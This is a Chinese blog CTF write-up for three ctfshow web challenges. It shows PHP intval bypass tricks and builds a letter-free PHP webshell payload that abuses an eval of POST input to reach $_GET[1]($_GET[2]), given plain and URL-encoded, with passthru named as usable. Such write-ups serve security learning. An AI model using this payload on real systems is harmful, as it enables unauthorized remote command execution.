ctfshow 吃瓜杯 web 部分题

最新推荐文章于 2024-05-21 12:45:25 发布
最新推荐文章于 2024-05-21 12:45:25 发布
阅读量723 收藏 1
点赞数 3
文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccfly1012/article/details/120187668
版权

目录

热身

shellme

shellme_Revenge

热身

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com
​
*/
​
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

源码奉上,这个题在web入门出现过

具体做法如下:

首先看到了字母被禁了

if(!strpos($num, "0"))这个语句告诉我们开头不能为0

很明显我们要用八进制,然后这个地方还要在值前加上一个+或空格

是因为考察了一个intval性质

1.如果字符串包括了 “0x” (或 “0X”) 的前缀,使用 16 进制 (hex);否则,
2.如果字符串以 “0” 开始,使用 8 进制(octal);
3.否则,将使用 10 进制 (decimal)

这个地方字母被禁了,不能16进制,

需要加个+或空格即可绕过

?num=+010574

shellme

直接ctrl+f搜索flag就得到了

shellme_Revenge

 过滤掉了超多东西,然后找到hint=%3F

?等于%3F

直接构造

?looklook=1

得到源码

<?php
error_reporting(0);
if ($_GET['looklook']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("fucccc hacker!!");
        }
    }
} else {
​
    phpinfo();
}
?>

大体意思为

post传入一个参数ctf_show
ctf_show具有长度的限制
然后又有很禁用的字符等(但给我们了C和123)
然后执行命令

所以我们要构造出

$_GET[0]($_GET[1])

具体的方法为:

NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。首次引入NaN的是1985年的IEEE 754浮点数标准。
​
INF:infinite,表示“无穷大”。 超出浮点数的表示范围(溢出,即阶码部分超过其能表示的最大值)。

进行拼接

$_=C/C;//NAN
$_=1/C//INF

C/C在这,实际在运算的时候会变成0/0。1/C变成1/0

然后想要单个的字符还需要连接一个字符;

<?php
$a = C/C.C;
echo $a[0];//N
?>

我们需要的语句为$GET[0]($GET[1])

<?php
$_=C;
$_++; //D
$C=++$_; //E
$_++; //F
$C_=++$_; //G
$_=(C/C.C)[0]; //N
$_++; //O
$_++; //P
$_++; //Q
$_++; //R
$_++; //S
$_=_.$C_.$C.++$_; //_GET
$$_[1]($$_[2]); //$_GET[1]($_GET[2])
?>

payload:

ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]);

但是最后post传入的值要进行url编码

ctf_show=%24_%3DC%3B%24_%2B%2B%3B%24C%3D%2B%2B%24_%3B%24_%2B%2B%3B%24C_%3D%2B%2B%24_%3B%24_%3D(C%2FC.C)%5B0%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24C_.%24C.%2B%2B%24_%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B

还有就是进行命令执行,经过测试passthru没有被禁

 

parkour-
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
[CTFSHOW]给你shell-Writeup
Y4tacker的博客
11-28 1882
文章目录前言给你shell 前言 学习网上各大佬的姿势进行学习,很开心 给你shell 审查元素,发现关键信息 ①<!--flag is in /flag.txt--> ②<a href='./?view_source' 下面进行最枯燥的代码审计环节啦~~ <?php error_reporting(0); include "config.php"; //这句话没啥用跳过 if (isset($_GET['view_source'])) { show_source(__FI
ctfshow 吃瓜杯 shellme_Revenge
Lum1n0us's Blog
08-16 1536
文章目录前言自增目wp 前言 在这次ctfshow的吃瓜杯比赛中,出现了一道利用自增运算符来造成命令执行的目shellme_Revenge,以前只学过异或、或和取反的方法,因此这次来学习一波 主要是参考p神的文章一些不包含数字和字母的webshell 自增 在php中,当把字符串和数组连接在一起时,最终返回的值是Array <?php echo ''.[]; 且php中a++ => b,b++ =>c,那么只要取Array中的第一个字母A和第四个字母a,就可以得到A-Z和a-z的所
shellctf2022-writeup
Todog的博客
08-18 387
CTF
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 6542
文章目录签到登录就有flag出人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
ctfshow web2|手工注入|sqlmap|getshell练习
spring!
03-26 1898
爆表名 `username=2&password=3' or 1=1 union select 1,(select group_concat( table_name) from information_schema.``TABLES`` where table_schema=database() limit 0,1),3 #` ![image-20220325104245704](https://cdn.jsdelivr.net/gh/r2233r/psBed@main/img/20220326162
ctf.show_36D杯_web_给你shell
qq_45628145的博客
05-22 1604
ctf.show_36D杯_web_给你shell 进入目,f12,有个链接view_source,还有个提示说flag在flag.txt里面,访问得到源码,下面是源码及分析 <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset($_GET['view_source'])) {
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
php 过滤所有的空,PHP代码审计(绕过过滤的空白字符)
weixin_42421187的博客
03-27 408
讨论一道代码审计这里打开网页并查看源代码并没有发现有用的信息查看他的HTTP头发现hint里有26966dc52e85af40f59b4fe73d8c323a.txt这个文件打开获得源代码$info = “”;$req = [];$flag=”xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx”;ini_set(“display_error”, false); //为一个配置...
php特性<1>--ctfshow
unexpectedthing的博客
11-01 629
文章目录1.数组绕过正则表达式web892.intvalweb90,92,93,94,953.正则表达式修饰符web91利用回溯最大次数绕过正则表达式4.路径问web965.md5绕过强类型比较弱类型比较md5碰撞第四种情况其他的hash值(md4,CRC32)web976.三目运算符web987.变量覆盖前言$$使用不当extract()函数使用不当parse_str()函数使用不当import_request_variables()使用不当8.对preg_replace的研究9.in_array的特性
php is numeric绕过,is_numeric和trim导致的判断绕过
weixin_33558958的博客
04-02 680
前两天做了一道前段时间的三个白帽,遇到了一个有趣的php黑魔法…目的源码首先是这样的123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657...
CTFSHOW_RCE极限挑战
v2ish1yan的博客
11-20 956
CTFSHOW的rce极限挑战
is_string() 函数
冷月醉雪的博客
04-26 2601
查看更多 https://www.yuque.com/docs/share/536d568f-bfd7-4389-92f6-cac158a583e3
php语言特性
weixin_63231007的博客
04-15 1902
<1>弱类型比较 我们来看下面一道: if($_GET['a']!=$_GET['b'] && md5($_GET['a'])==md5($_GET['b'])){ ehco flag; } 如何才能满足这样的if判断条件呢?需要使两个变量不相等而md5值相等。这样的思路可以通过MD5碰撞来解决。让我们思路回到php语言,==存在弱类型比较,而md5函数返回值是一个32位的字符串,如果字符串以"0e"开头的话,类型转换机制会将它识别为一个科学计数法表
Web】CISCN 2024初赛 解(全)
最新发布
uuzeray的博客
05-21 1163
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
ctfshow-web-web红包
07-14
### 回答1: ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包是一个CTF(Capture the Flag)比赛中的Web目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解方法还需要根据目中的具体情况来确定。在CTF比赛中,每个目的设置都可能不同,解的方法和思路也会有所差异。因此,在解过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包是一个CTF比赛中的网络目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值